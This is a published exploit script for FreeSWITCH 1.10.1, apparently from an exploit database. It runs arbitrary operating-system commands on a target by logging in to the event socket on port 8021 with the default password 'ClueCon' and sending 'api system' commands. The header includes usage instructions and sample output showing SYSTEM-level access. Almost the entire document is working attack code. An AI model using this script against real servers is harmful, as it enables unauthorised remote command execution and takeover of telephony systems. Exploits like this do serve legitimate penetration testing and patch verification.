Share
# Exploit Title: FreeSWITCH 1.10.1 - Command Execution  
# Date: 2019-12-19  
# Exploit Author: 1F98D  
# Vendor Homepage: https://freeswitch.com/  
# Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi  
# Version: 1.10.1  
# Tested on: Windows 10 (x64)  
#  
# FreeSWITCH listens on port 8021 by default and will accept and run commands sent to  
# it after authenticating. By default commands are not accepted from remote hosts.  
#  
# -- Example --  
# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami  
# Authenticated  
# Content-Type: api/response  
# Content-Length: 20  
#  
# nt authority\system  
#   
  
#!/usr/bin/python3  
  
from socket import *  
import sys  
  
if len(sys.argv) != 3:  
print('Missing arguments')  
print('Usage: freeswitch-exploit.py <target> <cmd>')  
sys.exit(1)  
  
ADDRESS=sys.argv[1]  
CMD=sys.argv[2]  
PASSWORD='ClueCon' # default password for FreeSWITCH  
  
s=socket(AF_INET, SOCK_STREAM)  
s.connect((ADDRESS, 8021))  
  
response = s.recv(1024)  
if b'auth/request' in response:  
s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))  
response = s.recv(1024)  
if b'+OK accepted' in response:  
print('Authenticated')  
s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))  
response = s.recv(8096).decode()  
print(response)  
else:  
print('Authentication failed')  
sys.exit(1)  
else:  
print('Not prompted for authentication, likely not vulnerable')  
sys.exit(1)